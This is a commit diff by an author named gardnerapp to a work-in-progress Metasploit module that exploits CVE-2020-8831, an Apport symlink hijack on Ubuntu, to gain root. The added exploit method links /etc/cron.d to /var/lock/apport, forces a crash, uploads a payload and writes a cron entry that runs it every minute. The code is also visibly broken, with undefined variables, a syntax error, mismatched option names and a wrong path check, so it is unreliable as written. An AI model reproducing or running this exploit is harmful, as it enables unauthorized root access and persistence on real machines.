Add opts, update description, break up exploit method

Author: gardnerapp

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb

@@ -2,64 +2,90 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
-  # TODO get exact apport version after setting up a test environment
+  include Msf::Post::Linux::System
+  include Msf::Post::File
+  include Msf::Post::File::FileStat
+
   # TODO targets in the initialize method and how they work
   # TODO other priv esc vectors, startup folders, periodic scripts 
-  # The vunerable version of apport may be available on other systems, distros and versions 
-
+  # change name to apport exploit, checking lesser version of apport in check method, are they vunerable?
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Ubuntu Xenial Xerus Apport Symlink Hijacking Privilege Escalation ',
+        'Name' => 'Apport Symlink Hijacking Privilege Escalation ',
         'Description' => %q{
-        	On the Ubuntu Xenial Xerus 16.04.7 release the Apport 2.20 crash handler is vulnerable
-        	to symlink injection. Following a crash Apport will write reports to /var/lock/apport/lock, 
+        	On some Ubuntu releases such as Xenial Xerus 16.04.7 the Apport 2.20 crash handler is vulnerable
+        	to symlink hijacking. Following a crash Apport will write reports to /var/lock/apport/lock, 
         	an attacker who can create a symlink to a privileged directory via /var/lock/apport will be 
-        	able to create files with global 0777 permissions. This module exploits this weaknes by writing 
-        	payloads to /etc/crontab/ as the root user.  
-          
+        	able to create files with global 0777 permissions. This module exploits this weaknes by creating a
+          symbolic link to /etc/cron.d/ in order to write a system crontab that will execute a payload with 
+          elevated permissions.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 
         	'gardnerapp' # mirageinfosec.cloud
         ],
         'References' => [
           [
-           'URL', 'https://nostarch.com/zero-day' # pg. 59
+           'URL', 'https://nostarch.com/zero-day', # pg. 59
+           'URL', 'https://ubuntu.com/security/CVE-2020-8831',
+           'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8831'
           ]
         ],
         'Platform' => 'linux',
         'Targets' => [
           [
-            
+            'Linux_Binary',
+            {
+              'Arch' => [ARCH_AARCH64, ARCH_X64]
+            }
+          ],
+          [
+            'Linux_Command',
+            {
+              'Arch' => ARCH_CMD
+               'Payload' =>
+                {
+                  'BadChars' => "\x22\x27"
+                }
+            }
           ]
         ],
         'Payload' => {
           'BadChars' => "\x00"
         },
         'Privileged' => false,
-        'DisclosureDate' => '',
+        'DisclosureDate' => '2 April 2020',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         },
       )
-      register_options [
-      	OptString.new('Cron Name', [true, 'Name of the Crontab file', Rex::Text.rand_text_alpha(rand(8..12))])
-      ]
+    )
+
+    register_options(
+      OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
+      OptString.new('PAYLOAD_FILENAME', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]),
+      OptString.new('CRON_FILENAME', [true, 'Name of the cron file', Rex::Text.rand_text_alpha(rand(8..12))]),
+      OptString.new('CRON_INTERVAL', [true, 'Specify how often the Cron should run. Default is every minute.', '* * * * *'])
     )
   end
 
   def check
-  	# Check Ubuntu
-    # Check Release
-    # Check Apport presence and version
-  	return CheckCode::Safe unless session.platform == 'linux'
+  	return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
+
+  	return CheckCode::Safe('Target is not Ubuntu') unless kernel_version =~ /[uU]buntu/
 
-  	return CheckCode::Safe unless kernel_version =~ /[uU]buntu/
+    sys_info = get_sysinfo
+    puts system_info
+
+    distro = sysinfo[:distro]
+    puts distro
+    version = sysinfo[:version]
+    puts system_info
 
   	# Check apport version
   	if !command_exists?('apport-cli')
@@ -75,16 +101,55 @@ def check
   	vulnerable = Rex::Version.new '2.20'
   	# Were there prior versions of apport which are NOT vulnerableii
   	# if version < vulnerable return bad 
- 
   end
 
-  def exploit
-    # Methods for 
-    # symlinking /var/lock/apport to /etc/crontab
-    # Touching a file to this
-    # verifying the permissions on the file (root ownership)
-    # writing payloads 
-    # what type of payloads
+  # hijack symlink by creating apport crash
+  def hijack_apport
+    # Create symlink
+    # might need to change linked directory
+    cmd_exec 'ln -s /etc/cron.d /var/lock/apport'
+
+    # CreatE crash and trigger apport
+    cmd_exec 'sleep 10s & kill -11 $!'
+
+    # need method for seeing if file is owned by root and combine with and gate
+    # if uid method does not work remove Msf::Post::File::FileStat
+    if !writable?('/etc/crontab/lock') || uid('/etc/crontab/lock') != 0
+      fail_with(Failue::NotFound, 'Exploit was unable to create a crontab owned by root.')
+    end
+  end 
+
+    def write_payload
+     print_status 'Uploading payload'
+
+     pay_dir = datastore['WritableDir']
+
+     pay_dir += '/' unless pay_dir.ends_with? '/'
+
+     pay_file = datastore['PayloadFilename']
+
+     @pay_dest = "#{pay_dir}#{pay_file}"
+
+    # create the payload
+    if target.arch.first == ARCH_CMD
+      payload = payload.encoded
+      upload_and_chmodx pay_dest, payload
+    else 
+      upload_and_chmodx pay_dest, generate_payload_exe
+    end 
   end
 
+  def write_cron
+    cron_file = datastore['CRON_FILENAME']
+    cron_interval = datastore['CRON_INTERVAL']
+    write_file(cron_file, "#{cron_interval} #{@pay_file}")
+  end
+
+  def exploit
+    hijack_apport
+
+    write_payload
+
+    write_cron
+  end
 end